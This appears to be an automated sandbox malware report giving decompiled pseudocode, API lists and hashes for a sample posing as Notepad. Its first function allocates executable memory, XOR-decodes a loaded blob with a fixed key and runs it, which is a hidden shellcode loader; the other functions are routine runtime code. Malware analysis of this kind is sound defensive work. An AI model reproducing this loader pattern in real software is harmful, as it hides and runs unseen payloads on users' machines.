				E0135A2C7(_t137, __edx, _t156, _t156, 0, 0);
				_t159 = VirtualAlloc(0, _t137, 0x3000, 0x40);
				E0135A048(_t95, _t137, 1, _t156);
				_t171 =  &_v116 + 0x34;
				if(_t137 == 0) {
					L6:
					 *_t159();
					__imp__#17();
					RegisterWindowMessageW(L"commdlg_FindReplace");
					E01354D30(_t156, 0x139ebd0, 0, 0x11f0);
					_t172 = _t171 + 0xc;
					 *0x139ebcc = _t163;
					_t172->cbSize = 0;
					_v131 = 0;
					_v130 = 0;
					_v129 = 0;
					_v128 = 0;
					_v127 = 0;
					_v126 = 0;
					_v125 = 0;
					_v124 = 0;
					_v123 = 0;
					_v122 = 0;
					_v121 = 0;
					_v120 = 0;
					_v119 = 0;
					_v118 = 0;
					_v117 = 0;
					_v116 = 0;
					_v115 = 0;
					_v114 = 0;
					_v113 = 0;
					_v112 = 0;
					_v111 = 0;
					_v110 = 0;
					_v109 = 0;
					_v108 = 0;
					_v107 = 0;
					_v106 = 0;
					_v105 = 0;
					_v104 = 0;
					_v103 = 0;
					_v102 = 0;
					_v101 = 0;
					_v100 = 0;
					_v99 = 0;
					_v98 = 0;
					_v97 = 0;
					_v96 = 0;
					_v95 = 0;
					_v94 = 0;
					_v93 = 0;
					_v92 = 0;
					_v91 = 0;
					_v90 = 0;
					_v89 = 0;
					_v88 = 0;
					_v87 = 0;
					_v86 = 0;
					_v85 = 0;
					_t172->cbSize = 0x30;
					_v124 = E013530B0;
					_t100 =  *0x139ebcc; // 0x0
					_v112 = _t100;
					_v108 = LoadIconW(_t100, 0x300);
					_t102 = GetSystemMetrics(0x32);
					_v88 = LoadImageW( *0x139ebcc, 0x300, 1, GetSystemMetrics(0x31), _t102, 0x8000);
					_v104 = LoadCursorW(0, 0x7f00);
					_v100 = 6;
					_v96 = 0x201;
					_v92 = L"Notepad";
					_t107 = RegisterClassExW(_t172);
					if(_t107 == 0) {
						return 0;
					}
					__imp__MonitorFromRect(0x139fdc0, 1);
					_v64.cbSize = 0x28;
					GetMonitorInfoW(_t107,  &_v64);
					if( *0x139ebd0 == 0) {
						ExitProcess(1);
					}
					_t161 = _a8;
					if(E01351070() != 0) {
						SetWindowTextW( *0x139ebd8, 0x1394010);
						SendMessageW( *0x139ebd8, 0xcd, 0, 0);
						SetFocus( *0x139ebd8);
					}
					ShowWindow( *0x139ebd0, _t161);
					UpdateWindow( *0x139ebd0);
					DragAcceptFiles( *0x139ebd0, 1);
					GetCommandLineW();
					_t162 = LoadAcceleratorsW(_t163, 0x203);
					_t158 =  &_v92;
					if(GetMessageW(_t158, 0, 0, 0) == 0) {
						L16:
						return _v84;
					} else {
						do {
							if(IsDialogMessageW( *0x139ebd4, _t158) == 0 && TranslateAcceleratorW( *0x139ebd0, _t162, _t158) == 0) {
								TranslateMessage(_t158);
								DispatchMessageW(_t158);
							}
						} while (GetMessageW(_t158, 0, 0, 0) != 0);
						goto L16;
					}
				}
				_t165 = _t137;
				if(_t137 == 1) {
					L4:
					_t163 = _a4;
					if((_t165 & 0x00000001) != 0) {
						 *_t159 =  *_t159 ^  *(0 +  &(("248058040134")[0x5d6dd6]));
					}
					goto L6;
				}
				_t140 = _t165 & 0xfffffffe;
				_t144 = 0;
				_t156 = 0xaaaaaaab;
				asm("o16 nop [cs:eax+eax]");
				do {
					_t133 = (_t144 * 0xaaaaaaab >> 0x00000020 >> 0x00000001 & 0xfffffffc) + (_t144 * 0xaaaaaaab >> 0x00000020 >> 0x00000001 & 0xfffffffc) * 2;
					_t9 = _t144 - _t133 + "248058040134"; // 0x30383432
					 *(_t159 + _t144) =  *(_t159 + _t144) ^  *_t9 & 0x000000ff;
					_t13 =  ~_t133 +  &M01398564; // 0x35303834
					 *(_t159 + _t144 + 1) =  *(_t159 + _t144 + 1) ^  *(_t144 + _t13) & 0x000000ff;
					_t144 = _t144 + 2;
				} while (_t140 != _t144);
				goto L4;
			}






































































                                                                                              0x01352ce7
                                                                                              0x01352d02
                                                                                              0x01352d09
                                                                                              0x01352d1a
                                                                                              0x01352d21
                                                                                              0x01352d39
                                                                                              0x01352d40
                                                                                              0x01352d45
                                                                                              0x01352d4a
                                                                                              0x01352dc9
                                                                                              0x01352dc9
                                                                                              0x01352dcb
                                                                                              0x01352dd6
                                                                                              0x01352de8
                                                                                              0x01352ded
                                                                                              0x01352df0
                                                                                              0x01352df6
                                                                                              0x01352dfa
                                                                                              0x01352dff
                                                                                              0x01352e04
                                                                                              0x01352e09
                                                                                              0x01352e0e
                                                                                              0x01352e13
                                                                                              0x01352e18
                                                                                              0x01352e1d
                                                                                              0x01352e22
                                                                                              0x01352e27
                                                                                              0x01352e2c
                                                                                              0x01352e31
                                                                                              0x01352e36
                                                                                              0x01352e3b
                                                                                              0x01352e40
                                                                                              0x01352e45
                                                                                              0x01352e4a
                                                                                              0x01352e4f
                                                                                              0x01352e54
                                                                                              0x01352e59
                                                                                              0x01352e5e
                                                                                              0x01352e63
                                                                                              0x01352e68
                                                                                              0x01352e6d
                                                                                              0x01352e72
                                                                                              0x01352e77
                                                                                              0x01352e7c
                                                                                              0x01352e81
                                                                                              0x01352e86
                                                                                              0x01352e8b
                                                                                              0x01352e90
                                                                                              0x01352e95
                                                                                              0x01352e9a
                                                                                              0x01352e9f
                                                                                              0x01352ea4
                                                                                              0x01352ea9
                                                                                              0x01352eae
                                                                                              0x01352eb3
                                                                                              0x01352eb8
                                                                                              0x01352ebd
                                                                                              0x01352ec2
                                                                                              0x01352ec7
                                                                                              0x01352ecc
                                                                                              0x01352ed1
                                                                                              0x01352ed6
                                                                                              0x01352edb
                                                                                              0x01352ee0
                                                                                              0x01352ee5
                                                                                              0x01352eec
                                                                                              0x01352ef4
                                                                                              0x01352ef9
                                                                                              0x01352f09
                                                                                              0x01352f15
                                                                                              0x01352f37
                                                                                              0x01352f48
                                                                                              0x01352f4c
                                                                                              0x01352f54
                                                                                              0x01352f5c
                                                                                              0x01352f67
                                                                                              0x01352f70
                                                                                              0x00000000
                                                                                              0x01353092
                                                                                              0x01352f7d
                                                                                              0x01352f83
                                                                                              0x01352f91
                                                                                              0x01352f9e
                                                                                              0x013530a0
                                                                                              0x013530a0
                                                                                              0x01352fa4
                                                                                              0x01352fb2
                                                                                              0x01352fbf
                                                                                              0x01352fd4
                                                                                              0x01352fe0
                                                                                              0x01352fe0
                                                                                              0x01352fed
                                                                                              0x01352ff9
                                                                                              0x01353007
                                                                                              0x0135300d
                                                                                              0x0135301f
                                                                                              0x01353021
                                                                                              0x01353034
                                                                                              0x0135308c
                                                                                              0x00000000
                                                                                              0x01353036
                                                                                              0x0135305d
                                                                                              0x01353068
                                                                                              0x0135307d
                                                                                              0x01353084
                                                                                              0x01353084
                                                                                              0x01353059
                                                                                              0x00000000
                                                                                              0x0135305d
                                                                                              0x01353034
                                                                                              0x01352d4e
                                                                                              0x01352d53
                                                                                              0x01352d9f
                                                                                              0x01352da3
                                                                                              0x01352daa
                                                                                              0x01352dc6
                                                                                              0x01352dc6
                                                                                              0x00000000
                                                                                              0x01352daa
                                                                                              0x01352d57
                                                                                              0x01352d5a
                                                                                              0x01352d5c
                                                                                              0x01352d61
                                                                                              0x01352d70
                                                                                              0x01352d79
                                                                                              0x01352d80
                                                                                              0x01352d87
                                                                                              0x01352d8c
                                                                                              0x01352d94
                                                                                              0x01352d98
                                                                                              0x01352d9b
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 01352D33
                                                                                              • __fread_nolock.LIBCMT ref: 01352D40
                                                                                              • #17.COMCTL32 ref: 01352DCB
                                                                                              • RegisterWindowMessageW.USER32(commdlg_FindReplace), ref: 01352DD6
                                                                                              • LoadIconW.USER32(00000000,00000300), ref: 01352F03
                                                                                              • GetSystemMetrics.USER32 ref: 01352F15
                                                                                              • GetSystemMetrics.USER32 ref: 01352F1B
                                                                                              • LoadImageW.USER32 ref: 01352F31
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 01352F42
                                                                                              • RegisterClassExW.USER32 ref: 01352F67
                                                                                              • MonitorFromRect.USER32(0139FDC0,00000001), ref: 01352F7D
                                                                                              • GetMonitorInfoW.USER32 ref: 01352F91
                                                                                              • SetWindowTextW.USER32(01394010), ref: 01352FBF
                                                                                              • SendMessageW.USER32(000000CD,00000000,00000000), ref: 01352FD4
                                                                                              • SetFocus.USER32 ref: 01352FE0
                                                                                              • ShowWindow.USER32(?), ref: 01352FED
                                                                                              • UpdateWindow.USER32 ref: 01352FF9
                                                                                              • DragAcceptFiles.SHELL32(00000001), ref: 01353007
                                                                                              • GetCommandLineW.KERNEL32 ref: 0135300D
                                                                                              • LoadAcceleratorsW.USER32 ref: 01353019
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0135302C
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 01353057
                                                                                              • IsDialogMessageW.USER32(?), ref: 01353064
                                                                                              • TranslateAcceleratorW.USER32(00000000,?), ref: 01353072
                                                                                              • TranslateMessage.USER32(?), ref: 0135307D
                                                                                              • DispatchMessageW.USER32 ref: 01353084
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$LoadWindow$MetricsMonitorRegisterSystemTranslate$AcceleratorAcceleratorsAcceptAllocClassCommandCursorDialogDispatchDragFilesFocusFromIconImageInfoLineRectSendShowTextUpdateVirtual__fread_nolock
                                                                                              • String ID: ($248058040134$Notepad$commdlg_FindReplace
                                                                                              • API String ID: 988272635-1103884732
                                                                                              • Opcode ID: 899178b3598213603dbb243ee108fcdb0e5ea49ac224c0ecb3a061d171943ba3
                                                                                              • Instruction ID: 51c1c045454290ca9a982c1fd1ca2dbc0e95305b67537d359c3505cf7894c87e
                                                                                              • Opcode Fuzzy Hash: 899178b3598213603dbb243ee108fcdb0e5ea49ac224c0ecb3a061d171943ba3
                                                                                              • Instruction Fuzzy Hash: 9FA1823110C380EEE322DB69D819B1BBFE86B95708F08455CF5C59B2C6C7B68508CBA7
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01369F76 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 96%
                                                                                              			E01369F76(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E01382815(_t27, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}
















                                                                                              0x01369f7c
                                                                                              0x01369f83
                                                                                              0x0136a027
                                                                                              0x0136a040
                                                                                              0x0136a046
                                                                                              0x0136a04b
                                                                                              0x0136a04d
                                                                                              0x0136a04d
                                                                                              0x0136a053
                                                                                              0x0136a056
                                                                                              0x0136a056
                                                                                              0x0136a042
                                                                                              0x0136a042
                                                                                              0x00000000
                                                                                              0x0136a042
                                                                                              0x01369f89
                                                                                              0x01369f8e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01369f94
                                                                                              0x01369f99
                                                                                              0x01369f9b
                                                                                              0x01369f9b
                                                                                              0x01369fa1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01369fa6
                                                                                              0x01369fbd
                                                                                              0x01369fbd
                                                                                              0x01369fc6
                                                                                              0x01369fc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01369fca
                                                                                              0x01369fcf
                                                                                              0x01369fd1
                                                                                              0x01369fd1
                                                                                              0x01369fd7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01369fdc
                                                                                              0x01369ffa
                                                                                              0x01369ffc
                                                                                              0x0136a01f
                                                                                              0x00000000
                                                                                              0x0136a024
                                                                                              0x0136a017
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136a019
                                                                                              0x00000000
                                                                                              0x0136a019
                                                                                              0x01369fde
                                                                                              0x01369fe6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01369fe8
                                                                                              0x01369feb
                                                                                              0x01369ff1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01369ff3
                                                                                              0x01369ff5
                                                                                              0x01369ff7
                                                                                              0x00000000
                                                                                              0x01369ff7
                                                                                              0x01369fa8
                                                                                              0x01369fb0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01369fb2
                                                                                              0x01369fb5
                                                                                              0x01369fbb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01369fbb
                                                                                              0x01369fc1
                                                                                              0x01369fc3
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,01369937,00000002,00000000,?,?,?,01369937,?,00000000), ref: 0136A00F
                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,01369937,00000002,00000000,?,?,?,01369937,?,00000000), ref: 0136A038
                                                                                              • GetACP.KERNEL32(?,?,01369937,?,00000000), ref: 0136A04D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID: ACP$OCP
                                                                                              • API String ID: 2299586839-711371036
                                                                                              • Opcode ID: 47907200050ae9de74a295b8b4f89ae5148493df0e4dcf8447912e86e2b169bc
                                                                                              • Instruction ID: 5b72c56ada692b38ad3f00a1b0503368233cfb32bfc1f2afe656e776876635bd
                                                                                              • Opcode Fuzzy Hash: 47907200050ae9de74a295b8b4f89ae5148493df0e4dcf8447912e86e2b169bc
                                                                                              • Instruction Fuzzy Hash: 79218072700105EEEB358F58C940BA7B7AEEB48A6DB57C424E90AEB14DE732DE45C350
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 013697EE Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 87%
                                                                                              			E013697EE(void* __ecx, void* __edx, signed short _a4, signed short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				signed short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				signed short _t48;
				int _t49;
				void* _t53;
				signed short* _t57;
				signed short _t70;
				intOrPtr _t73;
				void* _t75;
				signed short _t76;
				intOrPtr _t83;
				short* _t86;
				signed short _t89;
				signed short* _t99;
				void* _t100;
				signed short _t101;
				signed int _t104;
				void* _t105;

				_t39 =  *0x139e210; // 0xbb40e64e
				_v8 = _t39 ^ _t104;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E0136373A(__ecx, __edx, _t101) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E0136373A(__ecx, __edx, _t101);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[2]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0x13959a4; // 0x17
					E013699E3(_t89, 0, 0x1395890, _t83 - 1, _t99);
					_t46 = _v24;
					_t105 = _t105 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					if(_t48 == 0 ||  *_t48 == _t97) {
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
					} else {
						L01369E66(_t89, _t97,  &_v20);
						_pop(_t89);
					}
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0 ||  *_t70 == _t97) {
						E01369D32(_t89, _t97,  &_v20);
					} else {
						E01369A44(_t89, _t97,  &_v20);
					}
					_pop(_t89);
					if(_v20 != 0) {
						_t100 = 0;
						goto L25;
					} else {
						_t73 =  *0x139588c; // 0x41
						_t75 = E013699E3(_t89, _t97, 0x1395580, _t73 - 1, _v24);
						_t105 = _t105 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t101 = E01369F76(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
								if(_t101 == 0 || IsValidCodePage(_t101 & 0x0000ffff) == 0 || IsValidLocale(_v16, 1) == 0) {
									goto L22;
								} else {
									_t57 = _v28;
									if(_t57 != 0) {
										 *_t57 = _t101;
									}
									E01362AAF(_v16,  &(_v24[0x128]), 0x55, _t100);
									if(_t86 == 0) {
										L34:
										_t53 = 1;
										L23:
										return L01353E0D(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
									} else {
										_t33 =  &(_t86[0x90]); // 0xd0
										E01362AAF(_v16, _t33, 0x55, _t100);
										if(GetLocaleInfoW(_v16, 0x1001, _t86, 0x40) == 0) {
											goto L22;
										}
										_t36 =  &(_t86[0x40]); // 0x30
										if(GetLocaleInfoW(_v12, 0x1002, _t36, 0x40) == 0) {
											goto L22;
										}
										_t38 =  &(_t86[0x80]); // 0xb0
										E0137033D(_t38, _t101, _t38, 0x10, 0xa);
										goto L34;
									}
								}
							}
							L22:
							_t53 = 0;
							goto L23;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0 ||  *_t76 == 0) {
							E01369D32(_t89, _t97,  &_v20);
						} else {
							E01369A44(_t89, _t97,  &_v20);
						}
						_pop(_t89);
						goto L21;
					}
				}
			}

































                                                                                              0x013697f6
                                                                                              0x013697fd
                                                                                              0x01369804
                                                                                              0x01369808
                                                                                              0x0136980c
                                                                                              0x0136981a
                                                                                              0x0136981f
                                                                                              0x01369820
                                                                                              0x01369821
                                                                                              0x01369822
                                                                                              0x0136982a
                                                                                              0x0136982c
                                                                                              0x01369832
                                                                                              0x01369838
                                                                                              0x0136983b
                                                                                              0x0136983d
                                                                                              0x01369840
                                                                                              0x01369844
                                                                                              0x0136984b
                                                                                              0x01369858
                                                                                              0x0136985d
                                                                                              0x01369860
                                                                                              0x01369863
                                                                                              0x01369863
                                                                                              0x01369865
                                                                                              0x01369868
                                                                                              0x0136986c
                                                                                              0x013698dc
                                                                                              0x013698e0
                                                                                              0x013698f3
                                                                                              0x013698fa
                                                                                              0x01369900
                                                                                              0x01369903
                                                                                              0x013698e7
                                                                                              0x013698eb
                                                                                              0x013698f0
                                                                                              0x013698f0
                                                                                              0x00000000
                                                                                              0x01369873
                                                                                              0x01369873
                                                                                              0x01369877
                                                                                              0x0136988d
                                                                                              0x0136987e
                                                                                              0x01369882
                                                                                              0x01369882
                                                                                              0x01369896
                                                                                              0x01369897
                                                                                              0x0136991f
                                                                                              0x00000000
                                                                                              0x0136989d
                                                                                              0x0136989d
                                                                                              0x013698ac
                                                                                              0x013698b1
                                                                                              0x013698b6
                                                                                              0x01369906
                                                                                              0x01369906
                                                                                              0x01369908
                                                                                              0x0136990c
                                                                                              0x01369921
                                                                                              0x0136992d
                                                                                              0x01369937
                                                                                              0x0136993d
                                                                                              0x00000000
                                                                                              0x0136995c
                                                                                              0x0136995c
                                                                                              0x01369961
                                                                                              0x01369963
                                                                                              0x01369963
                                                                                              0x01369974
                                                                                              0x0136997b
                                                                                              0x013699db
                                                                                              0x013699dd
                                                                                              0x01369910
                                                                                              0x0136991e
                                                                                              0x0136997d
                                                                                              0x01369980
                                                                                              0x0136998a
                                                                                              0x013699a2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013699aa
                                                                                              0x013699c1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013699cb
                                                                                              0x013699d3
                                                                                              0x00000000
                                                                                              0x013699d8
                                                                                              0x0136997b
                                                                                              0x0136993d
                                                                                              0x0136990e
                                                                                              0x0136990e
                                                                                              0x00000000
                                                                                              0x0136990e
                                                                                              0x013698b8
                                                                                              0x013698ba
                                                                                              0x013698be
                                                                                              0x013698d4
                                                                                              0x013698c5
                                                                                              0x013698c9
                                                                                              0x013698c9
                                                                                              0x013698d9
                                                                                              0x00000000
                                                                                              0x013698d9
                                                                                              0x01369897

                                                                                              APIs
                                                                                                • Part of subcall function 0136373A: GetLastError.KERNEL32(?,00000008,0136545D), ref: 0136373E
                                                                                                • Part of subcall function 0136373A: SetLastError.KERNEL32(00000000,00000000,FFFFFFFF,000000FF), ref: 013637E0
                                                                                              • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 013698FA
                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 01369943
                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 01369952
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0136999A
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 013699B9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                              • String ID:
                                                                                              • API String ID: 415426439-0
                                                                                              • Opcode ID: 0ce291349e71b323ec2da833496c63a430ee69cbf0723523f74bc2f646a257fc
                                                                                              • Instruction ID: 4bc6df6b2278a3c4a42cbc4fad6014f14f6a635b50391f9e7b8b60e424cc5d6f
                                                                                              • Opcode Fuzzy Hash: 0ce291349e71b323ec2da833496c63a430ee69cbf0723523f74bc2f646a257fc
                                                                                              • Instruction Fuzzy Hash: 5D513F72A0020A9EEF21DFA9CC44BBE7BFCAF5470CF058469E615EB148E7719944CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0136D7FE Relevance: 6.2, APIs: 4, Instructions: 205COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 82%
                                                                                              			E0136D7FE(void* __esi, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v600;
				char _v601;
				void* _v608;
				union _FINDEX_INFO_LEVELS _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				signed int _v624;
				union _FINDEX_INFO_LEVELS _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				union _FINDEX_INFO_LEVELS _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				void* __ebx;
				void* __edi;
				signed int _t57;
				char _t59;
				signed char _t60;
				signed int _t66;
				signed int _t72;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				intOrPtr* _t90;
				signed int _t93;
				intOrPtr _t103;
				union _FINDEX_INFO_LEVELS _t105;
				intOrPtr* _t106;
				signed int _t115;
				intOrPtr _t121;
				void* _t122;
				void* _t123;
				signed int _t124;
				signed int _t125;
				void* _t126;
				void* _t127;

				_t122 = __esi;
				_t57 =  *0x139e210; // 0xbb40e64e
				_v8 = _t57 ^ _t125;
				_t106 = _a8;
				_t120 = _a12;
				_t121 = _a4;
				_v608 = _t120;
				if(_t106 != _t121) {
					while(1) {
						_t103 =  *_t106;
						if(_t103 == 0x2f || _t103 == 0x5c || _t103 == 0x3a) {
							break;
						}
						_t106 = L01386FF0(_t121, _t106);
						if(_t106 != _t121) {
							continue;
						}
						break;
					}
					_t120 = _v608;
				}
				_t59 =  *_t106;
				_v601 = _t59;
				if(_t59 != 0x3a) {
					L10:
					_t105 = 0;
					__eflags = _t59 - 0x2f;
					if(__eflags == 0) {
						L13:
						_t60 = 1;
					} else {
						__eflags = _t59 - 0x5c;
						if(__eflags == 0) {
							goto L13;
						} else {
							__eflags = _t59 - 0x3a;
							_t60 = 0;
							if(__eflags == 0) {
								goto L13;
							}
						}
					}
					_v656 = _t105;
					_v652 = _t105;
					_push(_t122);
					asm("sbb eax, eax");
					_v648 = _t105;
					_v644 = _t105;
					_v660 =  ~(_t60 & 0x000000ff) & _t106 - _t121 + 0x00000001;
					_v640 = _t105;
					_v636 = _t105;
					_t66 = E0136D09D(_t106 - _t121 + 1, _t121,  &_v656, L0136CF83(_t120, __eflags));
					_t127 = _t126 + 0xc;
					asm("sbb eax, eax");
					_t123 = FindFirstFileExW( !( ~_t66) & _v648, _t105,  &_v600, _t105, _t105, _t105);
					__eflags = _t123 - 0xffffffff;
					if(_t123 != 0xffffffff) {
						_t110 = _v608;
						_t72 =  *((intOrPtr*)(_v608 + 4)) -  *_v608;
						__eflags = _t72;
						_v664 = _t72 >> 2;
						do {
							_v632 = _t105;
							_v628 = _t105;
							_v624 = _t105;
							_v620 = _t105;
							_v616 = _t105;
							_v612 = _t105;
							_t78 = E0136D572( &(_v600.cFileName),  &_v632,  &_v601, L0136CF83(_t120, __eflags));
							_t127 = _t127 + 0x10;
							asm("sbb eax, eax");
							_t81 =  !( ~_t78) & _v624;
							__eflags =  *_t81 - 0x2e;
							if( *_t81 != 0x2e) {
								L23:
								_push(_v608);
								_t82 = E0136D74D(_t110, _t81, _t121, _v660);
								_t127 = _t127 + 0x10;
								_v668 = _t82;
								__eflags = _t82;
								if(_t82 != 0) {
									__eflags = _v612 - _t105;
									if(_v612 != _t105) {
										E01364B6E(_v624);
									}
									FindClose(_t123);
									__eflags = _v636 - _t105;
									if(_v636 != _t105) {
										E01364B6E(_v648);
									}
									_t84 = _v668;
								} else {
									goto L24;
								}
							} else {
								_t110 =  *((intOrPtr*)(_t81 + 1));
								__eflags = _t110;
								if(_t110 == 0) {
									goto L24;
								} else {
									__eflags = _t110 - 0x2e;
									if(_t110 != 0x2e) {
										goto L23;
									} else {
